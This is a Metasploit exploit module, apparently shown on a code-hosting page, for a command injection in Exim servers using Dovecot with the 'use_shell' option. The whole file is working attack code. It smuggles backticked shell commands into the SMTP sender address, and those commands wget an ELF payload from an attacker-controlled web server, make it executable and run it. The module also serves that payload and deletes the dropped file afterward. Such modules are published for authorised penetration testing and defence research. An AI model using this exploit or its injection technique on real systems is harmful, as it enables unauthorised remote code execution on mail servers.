Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Smtp
10
  include Msf::Exploit::Remote::HttpServer
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14

15
  def initialize(info = {})
16
    super(update_info(info,
17
      'Name'           => 'Exim and Dovecot Insecure Configuration Command Injection',
18
      'Description'    => %q{
19
        This module exploits a command injection vulnerability against Dovecot with
20
        Exim using the "use_shell" option. It uses the sender's address to inject arbitrary
21
        commands, since this is one of the user-controlled variables. It has been
22
        successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common
23
        packages.
24
      },
25
      'Author'         =>
26
        [
27
          'Unknown', # From redteam-pentesting # Vulnerability Discovery and PoC
28
          'eKKiM', # PoC
29
          'juan vazquez' # Metasploit module
30
        ],
31
      'License'        => MSF_LICENSE,
32
      'References'     =>
33
        [
34
          [ 'OSVDB', '93004' ],
35
          [ 'EDB', '25297' ],
36
          [ 'URL', 'https://www.redteam-pentesting.de/advisories/rt-sa-2013-001' ]
37
        ],
38
      'Privileged'     => false,
39
      'Arch'           => ARCH_X86,
40
      'Platform'       => 'linux',
41
      'Payload'        =>
42
        {
43
          'DisableNops' => true
44
        },
45
      'Targets'        =>
46
        [
47
          [ 'Linux x86', { }],
48
        ],
49
      'DisclosureDate' => '2013-05-03',
50
      'DefaultTarget'  => 0))
51

52
      register_options(
53
      [
54
        OptString.new('EHLO', [ true, 'TO address of the e-mail', 'debian.localdomain']),
55
        OptString.new('MAILTO', [ true, 'TO address of the e-mail', '[email protected]']),
56
        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
57
        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
58
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 80 ]),
59
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
60
      ])
61

62
      register_advanced_options(
63
      [
64
        OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false])
65
      ])
66

67
      deregister_options('MAILFROM')
68
  end
69

70
  # wait for the data to be sent
71
  def wait_linux_payload
72
    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
73

74
    waited = 0
75
    while (not @elf_sent)
76
      select(nil, nil, nil, 1)
77
      waited += 1
78
      if (waited > datastore['HTTP_DELAY'])
79
        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
80
      end
81
    end
82
  end
83

84
  # Handle incoming requests from the server
85
  def on_request_uri(cli, request)
86
    if (not @pl)
87
      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
88
      return
89
    end
90
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
91
    @elf_sent = true
92
    send_response(cli, @pl)
93
  end
94

95
  def exploit
96

97
    @pl = generate_payload_exe
98
    @elf_sent = false
99

100
    #
101
    # start our web server to deploy the final payload
102
    #
103
    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
104
    resource_uri = '/' + downfile
105

106
    if (datastore['DOWNHOST'])
107
      service_url_payload = datastore['DOWNHOST'] + resource_uri
108
    else
109

110
      # Needs to be on the port 80
111
      if datastore['SRVPORT'].to_i != 80
112
        fail_with(Failure::Unknown, 'The Web Server needs to live on SRVPORT=80')
113
      end
114

115
      #we use SRVHOST as download IP for the coming wget command.
116
      #SRVHOST needs a real IP address of our download host
117
      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
118
        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
119
      else
120
        srv_host = datastore['SRVHOST']
121
      end
122

123
      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
124
      service_url_payload = srv_host + resource_uri
125
      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
126
      start_service({'Uri' => {
127
        'Proc' => Proc.new { |cli, req|
128
          on_request_uri(cli, req)
129
        },
130
        'Path' => resource_uri
131
      },
132
      'ssl' => false # do not use SSL
133
    })
134

135
    end
136

137

138
    connect
139

140
    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
141
    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
142
      disconnect
143
      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
144
    end
145

146
    ehlo = datastore['EHLO']
147
    ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
148
    ehlo_resp.each_line do |line|
149
      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
150
    end
151

152
    #
153
    # Initiate the message
154
    #
155
    filename = rand_text_alpha_lower(8)
156
    from = rand_text_alpha(3)
157
    from << "`/usr/bin/wget${IFS}#{service_url_payload}${IFS}-O${IFS}/tmp/#{filename}`"
158
    from << "`chmod${IFS}+x${IFS}/tmp/#{filename}`"
159
    from << "`/tmp/#{filename}`"
160
    from << "@#{ehlo}"
161
    to   = datastore['MAILTO']
162

163
    resp = raw_send_recv("MAIL FROM: #{from}\r\n")
164
    resp ||= 'no response'
165
    msg = "MAIL: #{resp.strip}"
166
    if not resp or resp[0,3] != '250'
167
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
168
    else
169
      print_status("#{rhost}:#{rport} - #{msg}")
170
    end
171

172
    resp = raw_send_recv("RCPT TO: #{to}\r\n")
173
    resp ||= 'no response'
174
    msg = "RCPT: #{resp.strip}"
175
    if not resp or resp[0,3] != '250'
176
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
177
    else
178
      print_status("#{rhost}:#{rport} - #{msg}")
179
    end
180

181
    resp = raw_send_recv("DATA\r\n")
182
    resp ||= 'no response'
183
    msg = "DATA: #{resp.strip}"
184
    if not resp or resp[0,3] != '354'
185
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
186
    else
187
      print_status("#{rhost}:#{rport} - #{msg}")
188
    end
189

190
    message = "Subject: test\r\n"
191
    message <<  "\r\n"
192
    message << ".\r\n"
193

194
    resp = raw_send_recv(message)
195
    msg = "DELIVER: #{resp.strip}"
196
    if not resp or resp[0,3] != '250'
197
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
198
    else
199
      print_status("#{rhost}:#{rport} - #{msg}")
200
    end
201
    disconnect
202

203
    # wait for payload download
204
    if (datastore['DOWNHOST'])
205
      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload")
206
      select(nil, nil, nil, datastore['HTTP_DELAY'])
207
    else
208
      wait_linux_payload
209
    end
210
    register_file_for_cleanup("/tmp/#{filename}")
211

212
  end
213
end
214

215